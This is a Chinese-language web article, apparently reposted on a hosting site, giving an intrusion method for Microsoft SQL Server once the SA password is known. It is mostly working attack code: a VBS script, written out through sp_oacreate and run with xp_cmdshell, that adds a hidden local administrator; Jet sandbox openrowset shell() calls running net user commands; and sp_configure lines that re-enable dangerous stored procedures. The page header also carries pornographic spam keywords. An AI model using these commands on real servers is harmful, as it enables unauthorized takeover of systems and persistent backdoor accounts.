人妖在线一区,国产日韩欧美一区二区综合在线,国产啪精品视频网站免费,欧美内射深插日本少妇

新聞動(dòng)態(tài)

Microsoft SQL Server SA權(quán)限最新入侵方法

發(fā)布日期:2021-12-18 05:26 | 文章來源:站長之家
在獲得SA密碼后,往往因?yàn)榉?wù)器管理者或”前人”將net.exe和net1.exe被限制使用,無法添加管理員賬號(hào)。我們知道VBS在活動(dòng)目錄(ADSI)部分有一個(gè)winnt對象,用來管理本地資源,利用它可以不依靠CMD等命令就能添加一個(gè)管理員,具體代碼如下: set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os) '得到adsi接口,綁定
Set oe=GetObject(os&"/Administrators,group") '屬性,admin組
Set od=ob.Create("user","test") '建立用戶
od.SetPassword "1234" '設(shè)置密碼
od.SetInfo '保存
Set of=GetObject(os&"/test",user) '得到用戶
oe.add os&"/test" 將上面的代碼保存為1.vbs,然后執(zhí)行,命令為“cscript 1.vbs”,這樣就會(huì)在系統(tǒng)添加一個(gè)系統(tǒng)名為test,密碼為1234的用戶。具體在查詢分析器執(zhí)行的代碼如下: declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject
("WSCRIPT.NETWORK")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.
ComputerName'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject
(os&"/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create
("user","test")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "1234"'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo '
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject
(os&"/test",user) '
exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"' 執(zhí)行完上面的語句,再執(zhí)行下面這行代碼,這行代碼一定單獨(dú)執(zhí)行,不要與上面的放在一起執(zhí)行,否則會(huì)提示“c:\1.vbs正被另一個(gè)程序運(yùn)行”而無法成功添加用戶: exec master..xp_cmdshell 'cscript c:\1.vbs' 如果系統(tǒng)用戶沒有添加成功,有可能是因?yàn)橄到y(tǒng)用戶的密碼1234的太簡單,不符合服務(wù)器的復(fù)雜密碼策略,可以考慮設(shè)置的復(fù)雜些,然后再測試一下。也可以使用echo將代碼寫到1.vbs中,代碼格式為: exec master..xp_cmdshell 'echo set wsnetwork=CreateObject("WSCRIPT.NETWORK")
>>1.vbs' 不過,不知道為什么所有帶“&”字符的命令行都無法寫入1.vbs,感興趣的朋友可以嘗試解決一下。 使用jet沙盤模式,可以解決XP_cmdshell等存儲(chǔ)過程和相關(guān)動(dòng)態(tài)鏈接庫帶來的煩惱。出于安全原因,系統(tǒng)默認(rèn)情況下沙盤模式未開啟,這就需要xp_regwrite開啟沙盤模式: Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0
\Engines','SandBoxMode','REG_DWORD',1 然后執(zhí)行沙盤命令,在系統(tǒng)添加一個(gè)用戶名為test,密碼為1234的用戶: select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows
\system32\ias\ias.mdb','select shell("cmd.exe /c net user test 1234 /add")') select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows
\system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup
administrators test /add")') 不同的操作系統(tǒng),路徑也不一樣,需要根據(jù)情況做修改: NT/2K: c:\winnt\system32\
XP/2003: c:\windows\system32\ 另外Microsoft SQL Server2005在默認(rèn)情況下,一些存儲(chǔ)過程是關(guān)閉著的,需要命令打開: 開啟XP_cmdshell: EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure
'xp_cmdshell', 1;RECONFIGURE; 開啟'OPENROWSET': exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure
'Ad Hoc Distributed Queries',1;RECONFIGURE; 開啟'sp_oacreate': exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure
'Ole Automation Procedures',1;RECONFIGURE;

版權(quán)聲明:本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學(xué)習(xí)參考,不代表本站立場,如有內(nèi)容涉嫌侵權(quán),請聯(lián)系alex-e#qq.com處理。

相關(guān)文章

實(shí)時(shí)開通

自選配置、實(shí)時(shí)開通

免備案

全球線路精選!

全天候客戶服務(wù)

7x24全年不間斷在線

專屬顧問服務(wù)

1對1客戶咨詢顧問

在線
客服

在線客服:7*24小時(shí)在線

客服
熱線

400-630-3752
7*24小時(shí)客服服務(wù)熱線

關(guān)注
微信

關(guān)注官方微信
頂部